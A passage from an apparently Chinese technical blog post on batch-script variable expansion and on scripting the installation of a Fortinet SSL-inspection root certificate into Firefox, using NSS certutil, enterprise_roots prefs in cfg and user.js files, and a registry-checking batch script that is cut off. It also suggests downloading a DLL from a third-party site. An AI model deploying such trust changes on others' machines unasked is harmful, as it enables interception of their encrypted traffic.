class="line">)</span><br></pre></td></tr></table></figure><p>在这个示例脚本中,首先使用<code>set</code>命令给变量<code>Value1</code>赋初值为<code>"ww"</code>。然后,脚本使用<code>reg query</code>命令检查注册表中是否存在指定的注册表目录,如果存在,则使用<code>for /f</code>命令和<code>reg query</code>命令的输出来解析注册表值的名称和数据,并将其存储在变量<code>Value1</code>中。最后,脚本输出变量<code>Value1</code>的值,以及一个附加的字符串<code>1</code>。</p><p>请注意,在使用<code>echo</code>命令输出变量<code>Value1</code>的值之前,需要在变量名前加上<code>%</code>字符。否则,输出的将是变量名本身,而不是其存储的值。另外,变量<code>Value1</code>的值在<code>if</code>语句中被设置,因此需要在该语句块中使用<code>!</code>字符来代替<code>%</code>字符,以启用延迟变量扩展。这样,才能在语句块中正确地引用变量<code>Value1</code>的值。</p><p>我刚开始用%%输出变量值,发现跟预期不一致,万能的GPT帮我纠正了这个错误。</p><p>关于引用变量:</p><p>在 Windows 中,批处理脚本中使用变量时,有两种方式来引用变量的值:<code>%var%</code> 和 <code>!var!</code>。这两种方式的主要区别在于变量的扩展方式和生命周期。</p><p><code>%var%</code> 表示立即扩展变量,也称为百分号变量。在批处理脚本中,使用 <code>%var%</code> 可以将变量扩展为其当前值。变量在整个批处理脚本的生命周期内都是有效的,但是在某些情况下,它们可能不会像预期那样扩展。例如,如果要在一个代码块中使用变量,而该变量在该代码块之前已被更改,则百分号变量可能会扩展为旧值,而不是新值。</p><p><code>!var!</code> 表示延迟扩展变量,也称为感叹号变量。在批处理脚本中,使用 <code>!var!</code> 可以将变量扩展为其当前值,但是它是在运行时进行扩展的,而不是在解析时进行扩展的。因此,变量的生命周期仅限于它们在脚本中使用的代码块。如果需要在代码块中使用变量,并且该变量在代码块之前已被更改,则可以使用感叹号变量来确保变量扩展为其当前值。</p><p>在批处理脚本中,使用 <code>setlocal enabledelayedexpansion</code> 命令可以启用感叹号变量。启用延迟扩展后,可以使用 <code>!var!</code> 来引用变量的值。</p><p>因此,<code>%%</code> 表示百分号变量,<code>!!</code> 表示感叹号变量。在批处理脚本中,使用 <code>%%</code> 来引用百分号变量的值,使用 <code>!!</code> 来引用感叹号变量的值。</p><h3 id="脚本闪退怎么办"><a href="#脚本闪退怎么办" class="headerlink" title="脚本闪退怎么办"></a>脚本闪退怎么办</h3><p>脚本执行后马上闪退可能是由于脚本中的某个命令出错导致的。您可以尝试添加 <code>pause</code> 命令到脚本的末尾,这样脚本执行完毕后会暂停,以便您查看执行结果和错误信息。</p><p>如果您希望在脚本发生错误时能够看到错误信息,可以将 <code>@echo off</code> 命令注释掉,这样脚本在执行时会输出命令的执行结果和错误信息,以便您查看。</p><p>另外,您还可以尝试在命令行中执行脚本,而不是双击脚本文件来执行,这样如果脚本发生错误,错误信息将会一直显示在命令行中,直到您手动关闭命令行窗口。</p><p>最后,如果您仍然无法解决问题,可以尝试逐步注释掉脚本中的命令,直到找到引起问题的命令为止。</p><h2 id="关于Firefox证书"><a href="#关于Firefox证书" class="headerlink" title="关于Firefox证书"></a>关于Firefox证书</h2><p>firefox使用自己的证书库,其他浏览器如Chrome,使用操作系统的证书库。</p><h2 id="主要参考资料"><a href="#主要参考资料" class="headerlink" title="主要参考资料"></a>主要参考资料</h2><p><a href="https://wiki.mozilla.org/CA/AddRootToFirefox">https://wiki.mozilla.org/CA/AddRootToFirefox</a> (官方说法,最全。)</p><p><a href="https://stackoverflow.com/questions/1435000/programmatically-install-certificate-into-mozilla">https://stackoverflow.com/questions/1435000/programmatically-install-certificate-into-mozilla</a></p><h2 id="方法1:certutil-exe"><a href="#方法1:certutil-exe" class="headerlink" title="方法1:certutil.exe"></a>方法1:certutil.exe</h2><p>使用nss,下载nss包(官方已删除已仓库连接,没有编译好的版本,需重新编译)好像还需要NSPR,使用certutil.exe(和windows自带的certutil是两种不同的东西。)<br>参考地址:<a href="https://stackoverflow.com/questions/1435000/programmatically-install-certificate-into-mozilla">https://stackoverflow.com/questions/1435000/programmatically-install-certificate-into-mozilla</a><br><a href="https://stackoverflow.com/questions/50159193/how-to-add-certificate-programmatically-into-firefox-version-59-cannot-find-cer">https://stackoverflow.com/questions/50159193/how-to-add-certificate-programmatically-into-firefox-version-59-cannot-find-cer</a><br>文件下载路径:<br><a href="https://ftp.mozilla.org/pub/security/nss/releases/NSS_3_13_5_RTM/src/">https://ftp.mozilla.org/pub/security/nss/releases/NSS_3_13_5_RTM/src/</a><br><a href="https://ftp.mozilla.org/pub/nspr/releases/">https://ftp.mozilla.org/pub/nspr/releases/</a></p><p>构建方法:<a href="https://brpoblog.wordpress.com/2015/10/02/add-certificates-to-firefox-installation-with-certutil/">https://brpoblog.wordpress.com/2015/10/02/add-certificates-to-firefox-installation-with-certutil/</a></p><p>报错,提示缺少MSVCR71.DLL。下载此dll文件,放到bin文件夹。<br><a href="https://cn.dll-files.com/download/837b1e310f2aa8b20f07a9b1ce90ac4f/msvcr71.dll.html?c=d3JyZEIva1QwMm1IbFpwVGhQK1kwQT09">https://cn.dll-files.com/download/837b1e310f2aa8b20f07a9b1ce90ac4f/msvcr71.dll.html?c=d3JyZEIva1QwMm1IbFpwVGhQK1kwQT09</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">显示证书:</span><br><span class="line"></span><br><span class="line">certutil.exe -L -d "%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\urvqiw6e.default"</span><br><span class="line"></span><br><span class="line">安装证书:</span><br><span class="line"></span><br><span class="line">certutil.exe -A -n "SomeNametest" -t "u,u,u" -i D:\UserData\h4m5tdesktop\Fortinet_CA_SSL.cer -d "%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\urvqiw6e.default"</span><br><span class="line"></span><br><span class="line">安装之后再查看:</span><br><span class="line"></span><br><span class="line">certutil.exe -L -d "%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\urvqiw6e.default"</span><br><span class="line"></span><br><span class="line">发现已经在列表中了。</span><br></pre></td></tr></table></figure><p>certutil.exe使用方法:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H</span><br><span class="line">-A Add a certificate to the database (create if needed)</span><br><span class="line">-E Add an Email certificate to the database (create if needed)</span><br><span class="line"> -n cert-name Specify the nickname of the certificate to add</span><br><span class="line"> -t trustargs Set the certificate trust attributes:</span><br><span class="line"> p valid peer</span><br><span class="line"> P trusted peer (implies p)</span><br><span class="line"> c valid CA</span><br><span class="line"> T trusted CA to issue client certs (implies c)</span><br><span class="line"> C trusted CA to issue server certs (implies c)</span><br><span class="line"> u user cert</span><br><span class="line"> w send warning</span><br><span class="line"> g make step-up cert</span><br><span class="line"> -f pwfile Specify the password file</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -a The input certificate is encoded in ASCII (RFC1113)</span><br><span class="line"> -i input Specify the certificate file (default is stdin)</span><br><span class="line"></span><br><span class="line">-C Create a new binary certificate from a BINARY cert request</span><br><span class="line"> -c issuer-name The nickname of the issuer cert</span><br><span class="line"> -i cert-request The BINARY certificate request file</span><br><span class="line"> -o output-cert Output binary cert to this file (default is stdout)</span><br><span class="line"> -x Self sign</span><br><span class="line"> -m serial-number Cert serial number</span><br><span class="line"> -w warp-months Time Warp</span><br><span class="line"> -v months-valid Months valid (default is 3)</span><br><span class="line"> -f pwfile Specify the password file</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -1 Create key usage extension</span><br><span class="line"> -2 Create basic constraint extension</span><br><span class="line"> -3 Create authority key ID extension</span><br><span class="line"> -4 Create crl distribution point extension</span><br><span class="line"> -5 Create netscape cert type extension</span><br><span class="line"> -6 Create extended key usage extension</span><br><span class="line"> -7 Create an email subject alt name extension</span><br><span class="line"> -8 Create an dns subject alt name extension</span><br><span class="line"></span><br><span class="line">-G Generate a new key pair</span><br><span class="line"> -h token-name Name of token in which to generate key (default is internal)</span><br><span class="line"> -k key-type Type of key pair to generate ("dsa", "rsa" (default))</span><br><span class="line"> -g key-size Key size in bits, (min 512, max 2048, default 1024)</span><br><span class="line"> -y exp Set the public exponent value (3, 17, 65537) (rsa only)</span><br><span class="line"> -f password-file Specify the password file</span><br><span class="line"> -z noisefile Specify the noise file to be used</span><br><span class="line"> -q pqgfile read PQG value from pqgfile (dsa only)</span><br><span class="line"> -d keydir Key database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"></span><br><span class="line">-D Delete a certificate from the database</span><br><span class="line"> -n cert-name The nickname of the cert to delete</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"></span><br><span class="line">-U List all modules</span><br><span class="line"> -d moddir Module database directory (default is '~/.netscape')</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -X force the database to open R/W</span><br><span class="line"></span><br><span class="line">-K List all keys</span><br><span class="line"> -h token-name Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens)</span><br><span class="line"> -k key-type Type of key pair to list ("all", "dsa", "rsa" (default))</span><br><span class="line"> -f password-file Specify the password file</span><br><span class="line"> -d keydir Key database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -X force the database to open R/W</span><br><span class="line"></span><br><span class="line">-L List all certs, or print out a single named cert</span><br><span class="line"> -n cert-name Pretty print named cert (list all if unspecified)</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -X force the database to open R/W</span><br><span class="line"> -r For single cert, print binary DER encoding</span><br><span class="line"> -a For single cert, print ASCII encoding (RFC1113)</span><br><span class="line"></span><br><span class="line">-M Modify trust attributes of certificate</span><br><span class="line"> -n cert-name The nickname of the cert to modify</span><br><span class="line"> -t trustargs Set the certificate trust attributes (see -A above)</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"></span><br><span class="line">-N Create a new certificate database</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"></span><br><span class="line">-T Reset the Key database or token</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -h token-name Token to reset (default is internal)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">-O Print the chain of a certificate</span><br><span class="line"> -n cert-name The nickname of the cert to modify</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -X force the database to open R/W</span><br><span class="line"></span><br><span class="line">-R Generate a certificate request (stdout)</span><br><span class="line"> -s subject Specify the subject name (using RFC1485)</span><br><span class="line"> -o output-req Output the cert request to this file</span><br><span class="line"> -k key-type Type of key pair to generate ("dsa", "rsa" (default))</span><br><span class="line"> -h token-name Name of token in which to generate key (default is internal)</span><br><span class="line"> -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024)</span><br><span class="line"> -q pqgfile Name of file containing PQG parameters (dsa only)</span><br><span class="line"> -f pwfile Specify the password file</span><br><span class="line"> -d keydir Key database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -p phone Specify the contact phone number ("123-456-7890")</span><br><span class="line"> -a Output the cert request in ASCII (RFC1113); default is binary</span><br><span class="line"></span><br><span class="line">-V Validate a certificate</span><br><span class="line"> -n cert-name The nickname of the cert to Validate</span><br><span class="line"> -b time validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]")</span><br><span class="line"> -e Check certificate signature</span><br><span class="line"> -u certusage Specify certificate usage:</span><br><span class="line"> C SSL Client</span><br><span class="line"> V SSL Server</span><br><span class="line"> S Email signer</span><br><span class="line"> R Email Recipient</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -X force the database to open R/W</span><br><span class="line"></span><br><span class="line">-S Make a certificate and add to database</span><br><span class="line"> -n key-name Specify the nickname of the cert</span><br><span class="line"> -s subject Specify the subject name (using RFC1485)</span><br><span class="line"> -c issuer-name The nickname of the issuer cert</span><br><span class="line"> -t trustargs Set the certificate trust attributes (see -A above)</span><br><span class="line"> -k key-type Type of key pair to generate ("dsa", "rsa" (default))</span><br><span class="line"> -h token-name Name of token in which to generate key (default is internal)</span><br><span class="line"> -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024)</span><br><span class="line"> -q pqgfile Name of file containing PQG parameters (dsa only)</span><br><span class="line"> -x Self sign</span><br><span class="line"> -m serial-number Cert serial number</span><br><span class="line"> -w warp-months Time Warp</span><br><span class="line"> -v months-valid Months valid (default is 3)</span><br><span class="line"> -f pwfile Specify the password file</span><br><span class="line"> -d certdir Cert database directory (default is ~/.netscape)</span><br><span class="line"> -P dbprefix Cert & Key database prefix</span><br><span class="line"> -p phone Specify the contact phone number ("123-456-7890")</span><br><span class="line"> -1 Create key usage extension</span><br><span class="line"> -2 Create basic constraint extension</span><br><span class="line"> -3 Create authority key ID extension</span><br><span class="line"> -4 Create crl distribution point extension</span><br><span class="line"> -5 Create netscape cert type extension</span><br><span class="line"> -6 Create extended key usage extension</span><br><span class="line"> -7 Create an email subject alt name extension</span><br><span class="line"> -8 Create an dns subject alt name extension</span><br></pre></td></tr></table></figure><h2 id="方法2:用GitHub脚本更新cert8-db"><a href="#方法2:用GitHub脚本更新cert8-db" class="headerlink" title="方法2:用GitHub脚本更新cert8.db"></a>方法2:用GitHub脚本更新cert8.db</h2><p>使用<a href="https://github.com/christian-korneck/firefox_add-certs">https://github.com/christian-korneck/firefox_add-certs</a> (The release download includes a build of the NSS certutil.exe.)</p><h2 id="方法3:启用security-enterprise-roots-enabled"><a href="#方法3:启用security-enterprise-roots-enabled" class="headerlink" title="方法3:启用security.enterprise_roots.enabled"></a>方法3:启用security.enterprise_roots.enabled</h2><p><strong>适用于Firefox49版本及以上</strong></p><p><a href="https://support.mozilla.org/en-US/kb/setting-certificate-authorities-firefox">https://support.mozilla.org/en-US/kb/setting-certificate-authorities-firefox</a></p><p><a href="https://community.fortinet.com/t5/FortiGate/Technical-Note-Differences-between-SSL-Certificate-Inspection/ta-p/192301">https://community.fortinet.com/t5/FortiGate/Technical-Note-Differences-between-SSL-Certificate-Inspection/ta-p/192301</a></p><h3 id="手动启用"><a href="#手动启用" class="headerlink" title="手动启用"></a>手动启用</h3><p>替换firefox configuration</p><p><a href="https://support.umbrella.com/hc/en-us/articles/115000669728-Configuring-Firefox-to-use-the-Windows-Certificate-Store">https://support.umbrella.com/hc/en-us/articles/115000669728-Configuring-Firefox-to-use-the-Windows-Certificate-Store</a></p><p><a href="https://docs.trendmicro.com/all/ent/ddwi/2.5/en-us/ddwi_2.5_olh/Deploy-the-Default-C_001.html">https://docs.trendmicro.com/all/ent/ddwi/2.5/en-us/ddwi_2.5_olh/Deploy-the-Default-C_001.html</a></p><h3 id="cfg配置文件启用"><a href="#cfg配置文件启用" class="headerlink" title="cfg配置文件启用"></a>cfg配置文件启用</h3><p>创建ddwi.cfg,内容如下。复制到文件夹:</p><p>C:\Program Files\Mozilla Firefox\ddwi.cfg</p><p>C:\Program Files (x86)\Mozilla Firefox\ddwi.cfg</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"> //</span><br><span class="line">lockPref("security.enterprise_roots.enabled", true);</span><br></pre></td></tr></table></figure><p>创建local-settings.js,内容如下。复制到文件夹:</p><p>C:\Program Files\Mozilla Firefox\defaults\pref\local-settings.js</p><p>C:\Program Files (x86)\Mozilla Firefox\defaults\pref\local-settings.js</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pref("general.config.obscure_value", 0);</span><br><span class="line"> pref("general.config.filename", "ddwi.cfg");</span><br></pre></td></tr></table></figure><p>注意,通过上述启用此选项后,会出现过几分钟又变成false的现象,过一会儿又自动变成True,没查到为什么会有这种现象,暂未解决。所以建议手动更改此配置选项。或使用下面的另一种方法:修改user.js配置文件。</p><h3 id="user-js配置文件启用"><a href="#user-js配置文件启用" class="headerlink" title="user.js配置文件启用"></a>user.js配置文件启用</h3><p>参考:<a href="http://www.360doc.com/content/19/1031/22/73478_870350348.shtml">http://www.360doc.com/content/19/1031/22/73478_870350348.shtml</a></p><p><a href="https://kb.mozillazine.org/User.js_file">https://kb.mozillazine.org/User.js_file</a></p><p><img src="/2023/06/07/firefox-and-bat/profiles.png" alt="pic"></p><p>FireFox搜索框输入about:profiles,找到配置文件路径,一般情况下有两个配置文件目录。在如下路径:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%APPDATA%\Mozilla\Firefox\Profiles</span><br></pre></td></tr></table></figure><p>创建user.js文件,复制到此配置文件目录下。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user_pref("security.enterprise_roots.enabled", true);</span><br></pre></td></tr></table></figure><p>重启浏览器,发现此选项已经变成True</p><p><img src="/2023/06/07/firefox-and-bat/config.png" alt="pic"></p><h2 id="安装脚本"><a href="#安装脚本" class="headerlink" title="安装脚本"></a>安装脚本</h2><p>准备好证书文件,各种配置文件,以及用NSS库构建的certutil.exe文件和安装脚本。全部放到C盘根目录下的firefoxinstallcert文件夹。</p><p><strong>建议使用脚本2</strong></p><h3 id="脚本1"><a href="#脚本1" class="headerlink" title="脚本1"></a>脚本1</h3><p>通过cfg配置文件lockPref启用security.enterprise_roots.enabled。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">::开启变量延迟扩展</span><br><span class="line">setlocal EnableExtensions EnableDelayedExpansion</span><br><span class="line"></span><br><span class="line">echo ###checking new_version###</span><br><span class="line">echo --------------------------</span><br><span class="line">set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"</span><br><span class="line">set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"</span><br><span class="line">set regKey="CurrentVersion"</span><br><span class="line">set regValue=""</span><br><span class="line"></span><br><span class="line">set Value1="checkversion"</span><br><span class="line"></span><br><span class="line">rem 检查新版本注册表是否存在</span><br><span class="line">reg query %regPath1% >nul 2>nul</span><br><span class="line">echo %errorlevel%</span><br><span class="line">echo !errorlevel!</span><br><span class="line">if %errorlevel%==0 (</span><br><span class="line"> echo new_version Registry key %regkey% exists.</span><br><span class="line"> for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (</span><br><span class="line"> if "%regValue%"=="" (</span><br><span class="line"> echo value not exists</span><br><span class="line"> ) else (</span><br><span class="line"> set Value1=%%b</span><br><span class="line"> ) </span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo new_version Registry key %regkey% does not exist.</span><br><span class="line"> echo --------------------------</span><br><span class="line"> ::检查旧版本注册表路径是否存在</span><br><span class="line"> echo ###checking old_version###</span><br><span class="line"> reg query %regPath2% >nul 2>nul</span><br><span class="line"> if !errorlevel!==0 (</span><br><span class="line"> echo old_version Registry key %regkey% exists.</span><br><span class="line"> for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (</span><br><span class="line"> if "%regValue%"=="" (</span><br><span class="line"> echo value not exists</span><br><span class="line"> ) else (</span><br><span class="line"> set Value1=%%b</span><br><span class="line"> ) </span><br><span class="line"> )</span><br><span class="line"> ) else (</span><br><span class="line"> echo old_version Registry key %regkey% does not exist.</span><br><span class="line"> set Value1=0.0.0</span><br><span class="line"> )</span><br><span class="line"></span><br><span class="line"> echo !Value1!</span><br><span class="line"> echo %Value1%</span><br><span class="line"></span><br><span class="line"> set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"</span><br><span class="line"> echo Majorold: %Major%</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">echo !Value1!</span><br><span class="line">echo %Value1%</span><br><span class="line"></span><br><span class="line">set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"</span><br><span class="line">echo Majornew: %Major%</span><br><span class="line"></span><br><span class="line">::显示最终版本,若为0,则表示未安装Firefox</span><br><span class="line">echo --------------------------</span><br><span class="line">set final_version= %Major%</span><br><span class="line">echo final_version %final_version%</span><br><span class="line">echo --------------------------</span><br><span class="line"></span><br><span class="line">rem 检查版本号</span><br><span class="line">if %final_version% EQU 0 (</span><br><span class="line"> echo Program version is 0. Exiting script...</span><br><span class="line"> exit /b 1</span><br><span class="line">) else if %Major% LSS 49 (</span><br><span class="line"> call :function1</span><br><span class="line">) else (</span><br><span class="line"> call :function2</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">rem 退出脚本</span><br><span class="line">exit /b</span><br><span class="line"></span><br><span class="line">::</span><br><span class="line">:function1</span><br><span class="line">echo Program version is less than 49. Executing function 1...</span><br><span class="line">rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。</span><br><span class="line"></span><br><span class="line">::显示db中的现有证书</span><br><span class="line">set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"</span><br><span class="line">set default_name=""</span><br><span class="line">::判断证书数据库路径是否存在</span><br><span class="line">IF EXIST %db_path% (</span><br><span class="line"> echo default_path exists</span><br><span class="line"> rem 在这里添加需要执行的命令</span><br><span class="line"> set "count=0"</span><br><span class="line"> for /d %%i in ("%db_path%\*") do (</span><br><span class="line"> set /a count+=1</span><br><span class="line"> set "folder=%%~nxi"</span><br><span class="line"> )</span><br><span class="line"> ::判断是否只有*.default这一个文件夹</span><br><span class="line"> if !count! equ 1 (</span><br><span class="line"> 